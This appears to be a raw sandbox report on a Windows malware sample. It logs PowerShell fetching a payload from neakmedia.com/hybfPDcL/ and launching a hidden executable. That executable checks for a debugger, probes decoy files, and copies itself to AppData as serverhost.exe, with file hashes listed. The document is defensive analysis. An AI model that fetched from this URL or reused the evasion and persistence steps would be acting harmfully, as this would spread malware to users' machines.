Get Filename process_name = c:\windows\system32\windowspowershell\v1.0\powershell.exe, file_name_orig = C:\Windows\System32\WindowsPowerShell\v1.0\pOwerSheLL.exe, size = 260 True 2
Fn
Create Mapping filename = System Paging File, protection = PAGE_READWRITE, maximum_size = 131072 True 1
Fn
Map process_name = c:\windows\system32\windowspowershell\v1.0\powershell.exe, desired_access = FILE_MAP_WRITE True 1
Fn
System (9)
+
Operation Additional Information Success Count Logfile
Get Computer Name result_out = F71GWAT True 1
Fn
Get Info type = Operating System False 6
Fn
Get Info type = SYSTEM_PROCESS_INFORMATION True 1
Fn
Get Info type = Hardware Information True 1
Fn
Mutex (33)
+
Operation Additional Information Success Count Logfile
Create mutex_name = Global\.net clr networking True 10
Fn
Create mutex_name = Global\.net clr networking False 1
Fn
Create mutex_name = Global\.net clr networking True 5
Fn
Open mutex_name = Global\.net clr networking, desired_access = MUTEX_MODIFY_STATE, SYNCHRONIZE True 1
Fn
Release mutex_name = Global\.net clr networking True 1
Fn
Release mutex_name = Global\.net clr networking True 10
Fn
Release mutex_name = Global\.net clr networking True 5
Fn
Environment (122)
+
Operation Additional Information Success Count Logfile
Get Environment String name = MshEnableTrace False 114
Fn
Get Environment String name = PSMODULEPATH, result_out = C:\Windows\system32\WindowsPowerShell\v1.0\Modules\ True 1
Fn
Get Environment String name = HOMEDRIVE, result_out = C: True 1
Fn
Get Environment String name = HOMEPATH, result_out = \Users\BGC6u8Oy yXGxkR True 1
Fn
Get Environment String name = HomeDrive, result_out = C: True 1
Fn
Get Environment String name = HomePath, result_out = \Users\BGC6u8Oy yXGxkR True 1
Fn
Get Environment String name = temp, result_out = C:\Users\BGC6U8~1\AppData\Local\Temp True 2
Fn
Set Environment String name = PSMODULEPATH, value = C:\Users\BGC6u8Oy yXGxkR\Documents\WindowsPowerShell\Modules;C:\Windows\system32\WindowsPowerShell\v1.0\Modules\ True 1
Fn
Network Behavior
DNS (1)
+
Operation Additional Information Success Count Logfile
Resolve Name host = neakmedia.com, address_out = 70.39.145.109, service = 0 True 1
Fn
TCP Sessions (1)
+
Information Value
Total Data Sent 0.07 KB (72 bytes)
Total Data Received 100.39 KB (102804 bytes)
Contacted Host Count 1
Contacted Hosts 70.39.145.109:80
TCP Session #1
+
Information Value
Handle 0x530
Address Family AF_INET
Type SOCK_STREAM
Protocol IPPROTO_TCP
Remote Address 70.39.145.109
Remote Port 80
Local Address 0.0.0.0
Local Port 1728
Data Sent 0.07 KB (72 bytes)
Data Received 100.39 KB (102804 bytes)
Operations
Operation Additional Information Success Count Logfile
Create protocol = IPPROTO_TCP, address_family = AF_INET, type = SOCK_STREAM True 1
Fn
Connect remote_address = 70.39.145.109, remote_port = 80 True 1
Fn
Send flags = NO_FLAG_SET, size = 72, size_out = 72 True 1
Fn
Data
Receive flags = NO_FLAG_SET, size = 4096, size_out = 4096 True 1
Fn
Data
Receive flags = NO_FLAG_SET, size = 65536, size_out = 8972 True 1
Fn
Data
Receive flags = NO_FLAG_SET, size = 65536, size_out = 3752 True 1
Fn
Data
Receive flags = NO_FLAG_SET, size = 65536, size_out = 4960 True 1
Fn
Data
Receive flags = NO_FLAG_SET, size = 65536, size_out = 23232 True 1
Fn
Data
Receive flags = NO_FLAG_SET, size = 57785, size_out = 45012 True 1
Fn
Data
Receive flags = NO_FLAG_SET, size = 12773, size_out = 4356 True 1
Fn
Data
Receive flags = NO_FLAG_SET, size = 8417, size_out = 1452 True 1
Fn
Data
Receive flags = NO_FLAG_SET, size = 6965, size_out = 6965 True 1
Fn
Data
Receive flags = NO_FLAG_SET, size = 2, size_out = 2 True 1
Fn
Data
Receive flags = NO_FLAG_SET, size = 1, size_out = 1 True 3
Fn
Data
Receive flags = NO_FLAG_SET, size = 2, size_out = 2 True 1
Fn
Data
Close type = SOCK_STREAM True 1
Fn
HTTP Sessions (1)
+
Information Value
Total Data Sent 0.07 KB (72 bytes)
Total Data Received 100.39 KB (102804 bytes)
Contacted Host Count 1
Contacted Hosts neakmedia.com
HTTP Session #1
+
Information Value
Server Name neakmedia.com
Server Port 80
Data Sent 0.07 KB (72 bytes)
Data Received 100.39 KB (102804 bytes)
Operations
Operation Additional Information Success Count Logfile
Open Session access_type = WINHTTP_ACCESS_TYPE_NO_PROXY, proxy_name = WINHTTP_NO_PROXY_NAME, proxy_bypass = WINHTTP_NO_PROXY_BYPASS True 1
Fn
Open Connection protocol = http, server_name = neakmedia.com, server_port = 80 True 1
Fn
Open HTTP Request http_verb = GET, http_version = HTTP/1.1, target_resource = /hybfPDcL/ True 1
Fn
Send HTTP Request headers = host: neakmedia.com, connection: Keep-Alive, url = neakmedia.com/hybfPDcL/ True 1
Fn
Data
Read Response size = 4096, size_out = 4096 True 1
Fn
Data
Read Response size = 65536, size_out = 8972 True 1
Fn
Data
Read Response size = 65536, size_out = 3752 True 1
Fn
Data
Read Response size = 65536, size_out = 4960 True 1
Fn
Data
Read Response size = 65536, size_out = 23232 True 1
Fn
Data
Read Response size = 57785, size_out = 45012 True 1
Fn
Data
Read Response size = 12773, size_out = 4356 True 1
Fn
Data
Read Response size = 8417, size_out = 1452 True 1
Fn
Data
Read Response size = 6965, size_out = 6965 True 1
Fn
Data
Read Response size = 2, size_out = 2 True 1
Fn
Data
Read Response size = 1, size_out = 1 True 3
Fn
Data
Read Response size = 2, size_out = 2 True 1
Fn
Data
Close Session True 1
Fn
Process #3: 42753.exe
(Host: 566, Network: 0)
+
Information Value
ID #3
File Name c:\users\bgc6u8~1\appdata\local\temp\42753.exe
Command Line "C:\Users\BGC6U8~1\AppData\Local\Temp\42753.exe"
Initial Working Directory C:\Users\BGC6u8Oy yXGxkR\Desktop\
Monitor Start Time: 00:00:47, Reason: Child Process
Unmonitor End Time: 00:02:25, Reason: Terminated by Timeout
Monitor Duration 00:01:38
OS Process Information
+
Information Value
PID 0xad0
Parent PID 0xa68 (c:\windows\system32\windowspowershell\v1.0\powershell.exe)
Is Created or Modified Executable False
Integrity Level Medium
Username F71GWAT\BGC6u8Oy yXGxkR
Groups
  • F71GWAT\Domain Users (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
  • Everyone (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
  • BUILTIN\Administrators (USE_FOR_DENY_ONLY)
  • BUILTIN\Users (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
  • NT AUTHORITY\INTERACTIVE (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
  • CONSOLE LOGON (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
  • NT AUTHORITY\Authenticated Users (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
  • NT AUTHORITY\This Organization (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
  • NT AUTHORITY\Logon Session 00000000:0000fcb0 (MANDATORY, ENABLED_BY_DEFAULT, ENABLED, LOGON_ID)
  • LOCAL (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
  • NT AUTHORITY\NTLM Authentication (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
Enabled Privileges SeChangeNotifyPrivilege
Thread IDs
0x AD4
Region
+
Name Start VA End VA Type Permissions Monitored Dump YARA Match Actions
private_0x0000000000010000 0x00010000 0x0002ffff Private Memory Readable, Writable True True False
pagefile_0x0000000000010000 0x00010000 0x0001ffff Pagefile Backed Memory Readable, Writable True False False
private_0x0000000000020000 0x00020000 0x00020fff Private Memory Readable, Writable True True False
private_0x0000000000030000 0x00030000 0x0012ffff Private Memory Readable, Writable True True False
pagefile_0x0000000000130000 0x00130000 0x00133fff Pagefile Backed Memory Readable True False False
locale.nls 0x00140000 0x001a6fff Memory Mapped File Readable False False False
private_0x00000000001b0000 0x001b0000 0x001b0fff Private Memory Readable, Writable True True False
private_0x00000000001c0000 0x001c0000 0x001d1fff Private Memory Readable, Writable True True False
private_0x00000000001e0000 0x001e0000 0x001ecfff Private Memory Readable, Writable, Executable True True False
private_0x00000000001f0000 0x001f0000 0x001fcfff Private Memory Readable, Writable True True False
private_0x0000000000220000 0x00220000 0x0022ffff Private Memory Readable, Writable True True False
private_0x00000000002e0000 0x002e0000 0x003dffff Private Memory Readable, Writable True True False
42753.exe 0x00400000 0x00419fff Memory Mapped File Readable, Writable, Executable True False False
private_0x0000000000420000 0x00420000 0x004dffff Private Memory Readable, Writable True True False
pagefile_0x00000000004e0000 0x004e0000 0x005a7fff Pagefile Backed Memory Readable True False False
pagefile_0x00000000005b0000 0x005b0000 0x006b0fff Pagefile Backed Memory Readable True False False
pagefile_0x00000000006c0000 0x006c0000 0x012bffff Pagefile Backed Memory Readable True False False
private_0x00000000013b0000 0x013b0000 0x013bffff Private Memory Readable, Writable True True False
sortdefault.nls 0x013c0000 0x0168efff Memory Mapped File Readable False False False
esent.dll 0x5f9f0000 0x5fb92fff Memory Mapped File Readable, Writable, Executable False False False
comctl32.dll 0x6eb50000 0x6ebd3fff Memory Mapped File Readable, Writable, Executable False False False
msi.dll 0x70fc0000 0x711fffff Memory Mapped File Readable, Writable, Executable False False False
webio.dll 0x719c0000 0x71a0efff Memory Mapped File Readable, Writable, Executable False False False
winhttp.dll 0x71a10000 0x71a67fff Memory Mapped File Readable, Writable, Executable False False False
sspicli.dll 0x75320000 0x7533afff Memory Mapped File Readable, Writable, Executable False False False
msasn1.dll 0x75460000 0x7546bfff Memory Mapped File Readable, Writable, Executable False False False
kernelbase.dll 0x75470000 0x754b9fff Memory Mapped File Readable, Writable, Executable False False False
crypt32.dll 0x755b0000 0x756ccfff Memory Mapped File Readable, Writable, Executable False False False
sechost.dll 0x756f0000 0x75708fff Memory Mapped File Readable, Writable, Executable False False False
rpcrt4.dll 0x75710000 0x757b0fff Memory Mapped File Readable, Writable, Executable False False False
msctf.dll 0x757c0000 0x7588bfff Memory Mapped File Readable, Writable, Executable False False False
shell32.dll 0x758a0000 0x764e9fff Memory Mapped File Readable, Writable, Executable False False False
advapi32.dll 0x764f0000 0x7658ffff Memory Mapped File Readable, Writable, Executable False False False
kernel32.dll 0x76590000 0x76663fff Memory Mapped File Readable, Writable, Executable False False False
comdlg32.dll 0x76670000 0x766eafff Memory Mapped File Readable, Writable, Executable False False False
msvcrt.dll 0x76780000 0x7682bfff Memory Mapped File Readable, Writable, Executable False False False
lpk.dll 0x76830000 0x76839fff Memory Mapped File Readable, Writable, Executable False False False
gdi32.dll 0x76840000 0x7688dfff Memory Mapped File Readable, Writable, Executable False False False
user32.dll 0x76890000 0x76958fff Memory Mapped File Readable, Writable, Executable False False False
shlwapi.dll 0x76b40000 0x76b96fff Memory Mapped File Readable, Writable, Executable False False False
oleaut32.dll 0x76ba0000 0x76c2efff Memory Mapped File Readable, Writable, Executable False False False
iertutil.dll 0x76c60000 0x76e5afff Memory Mapped File Readable, Writable, Executable False False False
usp10.dll 0x76e60000 0x76efcfff Memory Mapped File Readable, Writable, Executable False False False
urlmon.dll 0x76f00000 0x77035fff Memory Mapped File Readable, Writable, Executable False False False
wininet.dll 0x77040000 0x77134fff Memory Mapped File Readable, Writable, Executable False False False
ole32.dll 0x77140000 0x7729bfff Memory Mapped File Readable, Writable, Executable False False False
ntdll.dll 0x772a0000 0x773dbfff Memory Mapped File Readable, Writable, Executable False False False
psapi.dll 0x773f0000 0x773f4fff Memory Mapped File Readable, Writable, Executable False False False
imm32.dll 0x77400000 0x7741efff Memory Mapped File Readable, Writable, Executable False False False
apisetschema.dll 0x774e0000 0x774e0fff Memory Mapped File Readable, Writable, Executable False False False
pagefile_0x000000007f6f0000 0x7f6f0000 0x7f7effff Pagefile Backed Memory Readable True False False
pagefile_0x000000007ffb0000 0x7ffb0000 0x7ffd2fff Pagefile Backed Memory Readable True False False
private_0x000000007ffde000 0x7ffde000 0x7ffdefff Private Memory Readable, Writable True True False
private_0x000000007ffdf000 0x7ffdf000 0x7ffdffff Private Memory Readable, Writable True True False
Host Behavior
File (2)
+
Operation Filename Additional Information Success Count Logfile
Create C:\email.doc desired_access = GENERIC_READ False 1
Fn
Create C:\a\foobar.bmp desired_access = GENERIC_READ False 1
Fn
Process (1)
+
Operation Process Additional Information Success Count Logfile
Create C:\Users\BGC6U8~1\AppData\Local\Temp\42753.exe os_pid = 0xae4, startup_flags = STARTF_FORCEOFFFEEDBACK, show_window = SW_HIDE True 1
Fn
Module (59)
+
Operation Module Additional Information Success Count Logfile
Load USER32.dll base_address = 0x76890000 True 1
Fn
Load ADVAPI32.dll base_address = 0x764f0000 True 1
Fn
Load KERNEL32.dll base_address = 0x76590000 True 2
Fn
Load ntdll.dll base_address = 0x772a0000 True 1
Fn
Load SHLWAPI.dll base_address = 0x76b40000 True 1
Fn
Load winhttp.dll base_address = 0x71a10000 True 7
Fn
Load urlmon.dll base_address = 0x76f00000 True 7
Fn
Load wininet.dll base_address = 0x77040000 True 7
Fn
Get Handle c:\users\bgc6u8~1\appdata\local\temp\42753.exe base_address = 0x400000 True 1
Fn
Get Filename c:\users\bgc6u8~1\appdata\local\temp\42753.exe process_name = c:\users\bgc6u8~1\appdata\local\temp\42753.exe, file_name_orig = C:\Users\BGC6U8~1\AppData\Local\Temp\42753.exe, size = 259 True 1
Fn
Get Filename process_name = c:\users\bgc6u8~1\appdata\local\temp\42753.exe, file_name_orig = C:\Users\BGC6U8~1\AppData\Local\Temp\42753.exe, size = 260 True 1
Fn
Get Address c:\windows\system32\user32.dll function = GetMessagePos, address_out = 0x768c6703 True 1
Fn
Get Address c:\windows\system32\user32.dll function = GetCaretBlinkTime, address_out = 0x768a0d01 True 1
Fn
Get Address function = VirtualAlloc, ordinal = 0, address_out = 0x12fbc4 True 1
Fn
Get Address function = VirtualAlloc, ordinal = 0, address_out = 0x12fbe4 True 1
Fn
Get Address function = LoadLibraryA, ordinal = 0, address_out = 0x12fc28 True 1
Fn
Get Address function = GetProcAddress, ordinal = 0, address_out = 0x12fc28 True 1
Fn
Get Address function = VirtualAlloc, ordinal = 0, address_out = 0x12fc28 True 1
Fn
Get Address function = VirtualProtect, ordinal = 0, address_out = 0x12fc28 True 1
Fn
Get Address function = UnmapViewOfFile, ordinal = 0, address_out = 0x12fc28 True 1
Fn
Get Address function = AddVectoredExceptionHandler, ordinal = 0, address_out = 0x12fc28 True 1
Fn
Get Address function = RemoveVectoredExceptionHandler, ordinal = 0, address_out = 0x12fc28 True 1
Fn
Get Address c:\windows\system32\advapi32.dll function = GetUserNameA, address_out = 0x7651a4b4 True 1
Fn
Get Address c:\windows\system32\kernel32.dll function = CreateFileA, address_out = 0x765dcee8 True 1
Fn
Get Address c:\windows\system32\kernel32.dll function = CloseHandle, address_out = 0x765dca7c True 1
Fn
Get Address c:\windows\system32\kernel32.dll function = GetModuleHandleA, address_out = 0x765dcf41 True 1
Fn
Get Address c:\windows\system32\kernel32.dll function = GetModuleFileNameA, address_out = 0x765e33f6 True 1
Fn
Get Address c:\windows\system32\kernel32.dll function = GetComputerNameA, address_out = 0x765c6ba9 True 1
Fn
Get Address c:\windows\system32\kernel32.dll function = GetComputerNameExA, address_out = 0x7661f41f True 1
Fn
Get Address c:\windows\system32\kernel32.dll function = lstrcmpA, address_out = 0x765c8c59 True 1
Fn
Get Address c:\windows\system32\kernel32.dll function = FreeConsole, address_out = 0x7663bfde True 1
Fn
Get Address c:\windows\system32\kernel32.dll function = VirtualAlloc, address_out = 0x765e2fb6 True 1
Fn
Get Address c:\windows\system32\kernel32.dll function = IsDebuggerPresent, address_out = 0x765d3ea8 True 1
Fn
Get Address c:\windows\system32\kernel32.dll function = GetCommandLineA, address_out = 0x765e98ff True 1
Fn
Get Address c:\windows\system32\kernel32.dll function = LoadLibraryA, address_out = 0x765e395c True 1
Fn
Get Address c:\windows\system32\ntdll.dll function = cos, address_out = 0x772e7400 True 1
Fn
Get Address c:\windows\system32\ntdll.dll function = sin, address_out = 0x772d41c0 True 1
Fn
Get Address c:\windows\system32\ntdll.dll function = strchr, address_out = 0x772e7690 True 1
Fn
Get Address c:\windows\system32\shlwapi.dll function = StrStrIA, address_out = 0x76b4d250 True 1
Fn
Get Address c:\windows\system32\kernel32.dll function = WTSGetActiveConsoleSessionId, address_out = 0x765c480b True 1
Fn
System (3)
+
Operation Additional Information Success Count Logfile
Get Computer Name result_out = F71GWAT True 1
Fn
Get Computer Name result_out = F71gwat, type = ComputerNameDnsHostname True 1
Fn
Get Info type = Windows Directory, result_out = C:\Windows True 1
Fn
Mutex (1)
+
Operation Additional Information Success Count Logfile
Create mutex_name = MACA73F0A True 1
Fn
Debug (499)
+
Operation Process Additional Information Success Count Logfile
Check for Presence c:\users\bgc6u8~1\appdata\local\temp\42753.exe True 499
Fn
Process #4: 42753.exe
(Host: 598, Network: 0)
+
Information Value
ID #4
File Name c:\users\bgc6u8~1\appdata\local\temp\42753.exe
Command Line "C:\Users\BGC6U8~1\AppData\Local\Temp\42753.exe"
Initial Working Directory C:\Users\BGC6u8Oy yXGxkR\Desktop\
Monitor Start Time: 00:00:50, Reason: Child Process
Unmonitor End Time: 00:02:25, Reason: Terminated by Timeout
Monitor Duration 00:01:35
OS Process Information
+
Information Value
PID 0xae4
Parent PID 0xad0 (c:\users\bgc6u8~1\appdata\local\temp\42753.exe)
Is Created or Modified Executable False
Integrity Level Medium
Username F71GWAT\BGC6u8Oy yXGxkR
Groups
  • F71GWAT\Domain Users (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
  • Everyone (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
  • BUILTIN\Administrators (USE_FOR_DENY_ONLY)
  • BUILTIN\Users (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
  • NT AUTHORITY\INTERACTIVE (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
  • CONSOLE LOGON (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
  • NT AUTHORITY\Authenticated Users (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
  • NT AUTHORITY\This Organization (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
  • NT AUTHORITY\Logon Session 00000000:0000fcb0 (MANDATORY, ENABLED_BY_DEFAULT, ENABLED, LOGON_ID)
  • LOCAL (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
  • NT AUTHORITY\NTLM Authentication (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
Enabled Privileges SeChangeNotifyPrivilege
Thread IDs
0x AE8
0x AEC
0x AF0
0x AF4
Region
+
Name Start VA End VA Type Permissions Monitored Dump YARA Match Actions
private_0x0000000000010000 0x00010000 0x0002ffff Private Memory Readable, Writable True True False
pagefile_0x0000000000010000 0x00010000 0x0001ffff Pagefile Backed Memory Readable, Writable True False False
private_0x0000000000020000 0x00020000 0x00020fff Private Memory Readable, Writable True True False
private_0x0000000000030000 0x00030000 0x0012ffff Private Memory Readable, Writable True True False
pagefile_0x0000000000130000 0x00130000 0x00133fff Pagefile Backed Memory Readable True False False
locale.nls 0x00140000 0x001a6fff Memory Mapped File Readable False False False
private_0x00000000001b0000 0x001b0000 0x001b0fff Private Memory Readable, Writable True True False
private_0x00000000001c0000 0x001c0000 0x002bffff Private Memory Readable, Writable True True False
private_0x00000000002c0000 0x002c0000 0x0037ffff Private Memory Readable, Writable True True False
private_0x0000000000380000 0x00380000 0x00391fff Private Memory Readable, Writable True True False
private_0x00000000003a0000 0x003a0000 0x003acfff Private Memory Readable, Writable, Executable True True False
private_0x00000000003b0000 0x003b0000 0x003bcfff Private Memory Readable, Writable True True False
pagefile_0x00000000003c0000 0x003c0000 0x003c0fff Pagefile Backed Memory Readable, Writable True False False
pagefile_0x00000000003d0000 0x003d0000 0x003e8fff Pagefile Backed Memory Readable True False False
pagefile_0x00000000003d0000 0x003d0000 0x003d1fff Pagefile Backed Memory Readable True False False
windowsshell.manifest 0x003e0000 0x003e0fff Memory Mapped File Readable False False False
pagefile_0x00000000003e0000 0x003e0000 0x003e0fff Pagefile Backed Memory Readable True False False
pagefile_0x00000000003f0000 0x003f0000 0x003f1fff Pagefile Backed Memory Readable True False False
42753.exe 0x00400000 0x00419fff Memory Mapped File Readable, Writable, Executable True False False
pagefile_0x0000000000420000 0x00420000 0x004e7fff Pagefile Backed Memory Readable True False False
pagefile_0x00000000004f0000 0x004f0000 0x005f0fff Pagefile Backed Memory Readable True False False
pagefile_0x0000000000600000 0x00600000 0x00600fff Pagefile Backed Memory Readable True False False
private_0x0000000000610000 0x00610000 0x0061ffff Private Memory Readable, Writable True True False
pagefile_0x0000000000620000 0x00620000 0x0121ffff Pagefile Backed Memory Readable True False False
private_0x0000000001220000 0x01220000 0x0131ffff Private Memory Readable, Writable True True False
rpcss.dll 0x01320000 0x0137bfff Memory Mapped File Readable False False False
rpcss.dll 0x01320000 0x0137bfff Memory Mapped File Readable False False False
cversions.1.db 0x01320000 0x01323fff Memory Mapped File Readable True False False
cversions.2.db 0x01320000 0x01323fff Memory Mapped File Readable True False False
{afbf9f1a-8ee8-4c77-af34-c647e37ca0d9}.1.ver0x0000000000000015.db 0x01330000 0x01355fff Memory Mapped File Readable True False False
pagefile_0x0000000001360000 0x01360000 0x01360fff Pagefile Backed Memory Readable, Writable True False False
{6af0698e-d558-4f6e-9b3c-3716689af493}.2.ver0x0000000000000009.db 0x01370000 0x0139ffff Memory Mapped File Readable True False False
cversions.2.db 0x013a0000 0x013a3fff Memory Mapped File Readable True False False
pagefile_0x00000000013b0000 0x013b0000 0x013b0fff Pagefile Backed Memory Readable, Writable True False False
pagefile_0x00000000013b0000 0x013b0000 0x013b6fff Pagefile Backed Memory Readable True False False
private_0x00000000013c0000 0x013c0000 0x013cffff Private Memory Readable, Writable True True False
sortdefault.nls 0x013d0000 0x0169efff Memory Mapped File Readable False False False
private_0x00000000016a0000 0x016a0000 0x0179ffff Private Memory Readable, Writable True True False
private_0x00000000017a0000 0x017a0000 0x0189ffff Private Memory Readable, Writable True True False
private_0x00000000018a0000 0x018a0000 0x0199ffff Private Memory Readable, Writable True True False
private_0x00000000019a0000 0x019a0000 0x01a6ffff Private Memory Readable, Writable True True False
{ddf571f2-be98-426d-8288-1a9a39c3fda2}.2.ver0x0000000000000002.db 0x019a0000 0x01a05fff Memory Mapped File Readable True False False
pagefile_0x0000000001a10000 0x01a10000 0x01a11fff Pagefile Backed Memory Readable, Writable True False False
pagefile_0x0000000001a20000 0x01a20000 0x01a20fff Pagefile Backed Memory Readable, Writable True False False
private_0x0000000001a30000 0x01a30000 0x01a6ffff Private Memory Readable, Writable True True False
pagefile_0x0000000001a70000 0x01a70000 0x01b4efff Pagefile Backed Memory Readable True False False
pagefile_0x0000000001b50000 0x01b50000 0x01f42fff Pagefile Backed Memory Readable True False False
esent.dll 0x5f9f0000 0x5fb92fff Memory Mapped File Readable, Writable, Executable False False False
comctl32.dll 0x6eb50000 0x6ebd3fff Memory Mapped File Readable, Writable, Executable False False False
msi.dll 0x70fc0000 0x711fffff Memory Mapped File Readable, Writable, Executable False False False
webio.dll 0x719c0000 0x71a0efff Memory Mapped File Readable, Writable, Executable False False False
winhttp.dll 0x71a10000 0x71a67fff Memory Mapped File Readable, Writable, Executable False False False
uxtheme.dll 0x739d0000 0x73a0ffff Memory Mapped File Readable, Writable, Executable False False False
wtsapi32.dll 0x74180000 0x7418cfff Memory Mapped File Readable, Writable, Executable False False False
comctl32.dll 0x742b0000 0x7444dfff Memory Mapped File Readable, Writable, Executable False False False
propsys.dll 0x74600000 0x746f4fff Memory Mapped File Readable, Writable, Executable False False False
ntmarta.dll 0x74800000 0x74820fff Memory Mapped File Readable, Writable, Executable False False False
userenv.dll 0x74af0000 0x74b06fff Memory Mapped File Readable, Writable, Executable False False False
cryptsp.dll 0x74e70000 0x74e85fff Memory Mapped File Readable, Writable, Executable False False False
sspicli.dll 0x75320000 0x7533afff Memory Mapped File Readable, Writable, Executable False False False
cryptbase.dll 0x75340000 0x7534bfff Memory Mapped File Readable, Writable, Executable False False False
profapi.dll 0x753f0000 0x753fafff Memory Mapped File Readable, Writable, Executable False False False
msasn1.dll 0x75460000 0x7546bfff Memory Mapped File Readable, Writable, Executable False False False
kernelbase.dll 0x75470000 0x754b9fff Memory Mapped File Readable, Writable, Executable False False False
cfgmgr32.dll 0x754c0000 0x754e6fff Memory Mapped File Readable, Writable, Executable False False False
crypt32.dll 0x755b0000 0x756ccfff Memory Mapped File Readable, Writable, Executable False False False
devobj.dll 0x756d0000 0x756e1fff Memory Mapped File Readable, Writable, Executable False False False
sechost.dll 0x756f0000 0x75708fff Memory Mapped File Readable, Writable, Executable False False False
rpcrt4.dll 0x75710000 0x757b0fff Memory Mapped File Readable, Writable, Executable False False False
msctf.dll 0x757c0000 0x7588bfff Memory Mapped File Readable, Writable, Executable False False False
shell32.dll 0x758a0000 0x764e9fff Memory Mapped File Readable, Writable, Executable False False False
advapi32.dll 0x764f0000 0x7658ffff Memory Mapped File Readable, Writable, Executable False False False
kernel32.dll 0x76590000 0x76663fff Memory Mapped File Readable, Writable, Executable False False False
comdlg32.dll 0x76670000 0x766eafff Memory Mapped File Readable, Writable, Executable False False False
clbcatq.dll 0x766f0000 0x76772fff Memory Mapped File Readable, Writable, Executable False False False
msvcrt.dll 0x76780000 0x7682bfff Memory Mapped File Readable, Writable, Executable False False False
lpk.dll 0x76830000 0x76839fff Memory Mapped File Readable, Writable, Executable False False False
gdi32.dll 0x76840000 0x7688dfff Memory Mapped File Readable, Writable, Executable False False False
user32.dll 0x76890000 0x76958fff Memory Mapped File Readable, Writable, Executable False False False
setupapi.dll 0x769a0000 0x76b3cfff Memory Mapped File Readable, Writable, Executable False False False
shlwapi.dll 0x76b40000 0x76b96fff Memory Mapped File Readable, Writable, Executable False False False
oleaut32.dll 0x76ba0000 0x76c2efff Memory Mapped File Readable, Writable, Executable False False False
iertutil.dll 0x76c60000 0x76e5afff Memory Mapped File Readable, Writable, Executable False False False
usp10.dll 0x76e60000 0x76efcfff Memory Mapped File Readable, Writable, Executable False False False
urlmon.dll 0x76f00000 0x77035fff Memory Mapped File Readable, Writable, Executable False False False
wininet.dll 0x77040000 0x77134fff Memory Mapped File Readable, Writable, Executable False False False
ole32.dll 0x77140000 0x7729bfff Memory Mapped File Readable, Writable, Executable False False False
ntdll.dll 0x772a0000 0x773dbfff Memory Mapped File Readable, Writable, Executable False False False
psapi.dll 0x773f0000 0x773f4fff Memory Mapped File Readable, Writable, Executable False False False
imm32.dll 0x77400000 0x7741efff Memory Mapped File Readable, Writable, Executable False False False
wldap32.dll 0x77420000 0x77464fff Memory Mapped File Readable, Writable, Executable False False False
apisetschema.dll 0x774e0000 0x774e0fff Memory Mapped File Readable, Writable, Executable False False False
pagefile_0x000000007f6f0000 0x7f6f0000 0x7f7effff Pagefile Backed Memory Readable True False False
pagefile_0x000000007ffb0000 0x7ffb0000 0x7ffd2fff Pagefile Backed Memory Readable True False False
private_0x000000007ffdb000 0x7ffdb000 0x7ffdbfff Private Memory Readable, Writable True True False
private_0x000000007ffdc000 0x7ffdc000 0x7ffdcfff Private Memory Readable, Writable True True False
private_0x000000007ffdd000 0x7ffdd000 0x7ffddfff Private Memory Readable, Writable True True False
private_0x000000007ffde000 0x7ffde000 0x7ffdefff Private Memory Readable, Writable True True False
private_0x000000007ffdf000 0x7ffdf000 0x7ffdffff Private Memory Readable, Writable True True False
Created Files
+
Filename File Size Hash Values YARA Match Actions
c:\users\bgc6u8oy yxgxkr\appdata\local\microsoft\windows\serverhost.exe 100.00 KB (102400 bytes) MD5: d6c8126371d37ffe3100755db6aa22ed
SHA1: 294b381e200aa3f343989877c9ef5efdda25ca42
SHA256: fbff242aeeff98285e000ef03cfa96e87d6d63c41080d531edcb455646b64eec
False
c:\users\bgc6u8oy yxgxkr\appdata\local\microsoft\windows\serverhost.exe 92.00 KB (94208 bytes) MD5: 2b8584cab96d20ee851054f9fedef7f3
SHA1: de72320cc8fc12f2e410afa07809b620f81066dc
SHA256: f99020bb1a5659d35ad57d0dd13d053c7ab20c0b0b70201b71b4e3aafede7cd1
False
Host Behavior
File (13)
+
Operation Filename Additional Information Success Count Logfile
Create C:\email.doc desired_access = GENERIC_READ False 1
Fn
Create C:\a\foobar.bmp desired_access = GENERIC_READ False 1
Fn
Create C:\Users\BGC6U8~1\AppData\Local\Temp\42753.exe desired_access = GENERIC_READ, share_mode = FILE_SHARE_READ True 1
Fn
Get Info C:\Users\BGC6U8~1\AppData\Local\Temp\42753.exe type = size True 1
Fn
Get Info C:\ type = file_attributes True 1
Fn
Get Info C:\Users\ type = file_attributes True 1
Fn
Get Info C:\Users\BGC6u8Oy yXGxkR\ type = file_attributes True 1
Fn
Get Info C:\Users\BGC6u8Oy yXGxkR\AppData\ type = file_attributes True 1
Fn
Get Info C:\Users\BGC6u8Oy yXGxkR\AppData\Local\ type = file_attributes True 1
Fn
Get Info C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\ type = file_attributes True 1
Fn
Get Info C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\ type = file_attributes True 1
Fn
Move C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\serverhost.exe source_filename = C:\Users\BGC6U8~1\AppData\Local\Temp\42753.exe True 1
Fn
Delete C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\serverhost.exe:Zone.Identifier False 1
Fn
Process (1)
+
Operation Process Additional Information Success Count Logfile
Create C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\serverhost.exe os_pid = 0xaf8, startup_flags = STARTF_FORCEOFFFEEDBACK, show_window = SW_HIDE True 1
Fn
Module (70)
+
Operation Module Additional Information Success Count Logfile
Load USER32.dll base_address = 0x76890000 True 1
Fn
Load ADVAPI32.dll base_address = 0x764f0000 True 1
Fn
